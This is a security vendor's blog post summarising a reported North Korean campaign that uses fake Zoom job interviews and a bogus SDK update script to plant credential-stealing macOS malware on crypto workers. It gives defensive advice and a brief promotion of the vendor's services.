How North Korean Hackers Are Using Zoom to Infiltrate Crypto Startups
North Korean threat actors have launched an advanced cyberattack campaign against cryptocurrency companies, leveraging fake Zoom meeting invitations to breach their systems. This new wave of social engineering targets Web3 and blockchain firms by mimicking job interviews and injecting sophisticated malware during these interactions.
At the center of the campaign is a social engineering tactic designed to build trust. Hackers pose as recruiters offering enticing job opportunities. Once victims are engaged, they are invited to attend fake interviews conducted via Zoom. These invitations are accompanied by malicious instructions to install a bogus “Zoom SDK update script.” In reality, this script delivers an advanced malware payload directly to the victim’s system.
A Familiar Strategy with Dangerous Upgrades
This strategy reflects known North Korean cyber operations but has evolved significantly. The campaign has reportedly been active for over a year and focuses specifically on professionals working within the crypto space.
Security researchers have uncovered technical enhancements in the malware. Unlike past variants, the latest versions are built using multiple programming languages, complicating analysis and bypassing standard security detections.
How the Attack Chain Works
The malicious campaign combines several tactics into a cohesive attack chain:
-
Victims are contacted via email or messaging platforms under the pretense of a job offer.
-
After establishing rapport, the hacker schedules a Zoom call.
-
The victim receives a link and instructions to install a fake Zoom script, which actually launches the malware.
-
Once executed, the malware exploits macOS systems using AppleScript, C++, and binaries compiled with Nim.
This combination of programming languages results in an obfuscated and modular malware architecture. Each component has a precise role: AppleScript manipulates native macOS functions, C++ handles core operations, and Nim adds stealth by bypassing signature-based detection tools.
Why Nim Matters in This Campaign
One of the standout features of this operation is the use of the Nim programming language. Although relatively obscure, Nim allows attackers to compile lightweight, native executables. Its syntax differs significantly from traditional malware languages like Python or C#, reducing the chances of detection by antivirus engines.
By using Nim, the malware becomes less recognizable and more difficult to reverse-engineer. This programming tactic introduces blind spots in automated security scanners, giving attackers more time to act before being detected.
What the Malware Steals
Once deployed, the malware establishes a persistent connection via secure WebSockets. This allows hackers to issue commands in real time and exfiltrate sensitive data without raising alarms.
The primary targets include:
-
Stored credentials and cookies from browsers such as Chrome, Brave, Edge, Firefox, and Arc
-
macOS Keychain data containing authentication details
-
Telegram user data, including encrypted messages and potential two-factor authentication codes
This data theft enables full access to digital wallets, exchange accounts, and communication apps, providing threat actors with total control over their victims’ crypto assets.
Real Risks for Crypto Firms and Professionals
The campaign is a clear demonstration of how nation-state actors are adapting to target financial infrastructure tied to cryptocurrencies. The evolving use of uncommon programming languages and real-time exfiltration methods represents a dangerous trend in cyberattacks.
Companies operating in the Web3, DeFi, and blockchain spaces must implement robust cybersecurity measures. This includes secure onboarding processes, endpoint protection, and detection systems capable of analyzing non-traditional codebases.
At ZENDATA, we offer tailored cybersecurity services for blockchain startups and crypto enterprises. From threat detection to endpoint defense and secure architecture design, we help businesses defend against sophisticated adversaries.
Conclusion
This campaign showcases North Korea’s ongoing commitment to exploiting the cryptocurrency ecosystem through technical innovation and psychological manipulation. Organizations must remain vigilant and educate their teams on social engineering red flags, particularly when unsolicited interviews or meeting invitations are involved.
Read the full article of Cybersecurity News here
